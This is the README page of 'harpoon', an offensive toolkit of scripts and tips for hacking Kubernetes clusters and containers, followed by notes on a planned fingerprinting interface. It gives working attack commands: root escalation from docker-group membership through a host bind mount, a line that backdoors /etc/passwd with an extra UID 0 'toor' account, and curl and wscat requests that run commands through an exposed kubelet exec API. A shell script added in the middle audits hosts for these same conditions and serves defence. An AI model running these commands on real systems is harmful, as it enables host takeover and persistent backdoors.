professionallyevil / harpoon
A collection of scripts, and tips and tricks for hacking k8s clusters and containers.
License: MIT License
If it turns out that you are a part of the docker group, escalate to root with the following:
docker run -it --rm -v $PWD:/mnt bash
We can also backdoor the machine after this with:
echo 'toor:$1$.PWORDHASH:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
Just another reason why Docker bind mounts can be dangerous >:)
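To audit a host for the two conditions above (accounts in the docker group, and an extra UID 0 account with a password hash written directly into passwd), here is an added example that is not part of harpoon. The function names and the sample files are constructed for illustration; the toor line is the one shown above.

```shell
#!/bin/sh
# Added example, not harpoon code. Reads passwd(5)/group(5) format files.

# Accounts other than root that carry UID 0 (the "toor" pattern above).
uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Accounts with a crypt hash ("$id$...") in the passwd file itself; on a
# shadowed system this field is normally just "x".
inline_hash_accounts() {
    awk -F: 'substr($2, 1, 1) == "$" { print $1 }' "$1"
}

# Members of the docker group, one per line. Each can start a container
# with a host bind mount, so each is effectively root on the host.
docker_group_members() {
    awk -F: '$1 == "docker" && $4 != "" { gsub(",", "\n", $4); print $4 }' "$1"
}

# Print one finding per line: "<check> <account>".
audit() {
    uid0_accounts "$1"        | sed 's/^/extra-uid0 /'
    inline_hash_accounts "$1" | sed 's/^/inline-hash /'
    docker_group_members "$2" | sed 's/^/docker-group /'
}

# Demo on constructed sample files.
demo() {
    d=$(mktemp -d) || return 1
    cat > "$d/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
toor:$1$.PWORDHASH:0:0:root:/root:/bin/sh
EOF
    cat > "$d/group" <<'EOF'
root:x:0:
docker:x:998:alice,ci
EOF
    audit "$d/passwd" "$d/group"
    rm -rf "$d"
}

demo
```

On a real host, run `audit /etc/passwd /etc/group`; any output line is worth reviewing.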
harpoon kube-exec -h https://<node-ip | node-domain> [-p 10250] [-e command]
If -e is given and the preliminary checks pass, harpoon will try to exploit the misconfiguration. This attack only works if you can route to the node API, so you either have to be on the same network as the node, or the node has to be publicly routable.
[[ "$(curl --insecure "https://<node>:10250/pods" 2>/dev/null | head -c 2)" == '{"' ]] && echo Match
curl --insecure -v -H "Upgrade: WebSocket" -H "Connection: Upgrade" -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" -X POST "https://<node>:10250/exec/default/redis-master-57fc67768d-klfw6/master?command=echo&command=hi&input=1&output=1&tty=1"
wscat -c "https://<node>:10250/exec/default/redis-master-57fc67768d-klfw6/master?command=echo&command=hi&input=1&output=1&tty=1" --no-check
These are actually pretty similar to the Docker checks.
Can check for the LXD socket. Is it mounted in an LXD container?
/var/lib/lxd/unix.socket
Can we check proc cgroups?
For example:
-oA <basename> output in all formats
-oG output in grepable format
-oN output in normal format
Give the fingerprint command the following interface.
harpoon fingerprint -[adklD]
-a run all checks (default)
-d run only docker checks
-k run only kubernetes checks
-l run only lxc checks
-D attempt to discover container tech in place
Many of the commands expect the -sock and -cid flags. However as I start generalizing the tool to work on other container setups, this might not be as viable. It's possible that I either break them out into separate tools. One for Docker, one for LXC, one for Kubernetes, etc... Or I implement several modules into the program, and allow them to be loaded and unloaded via command line args.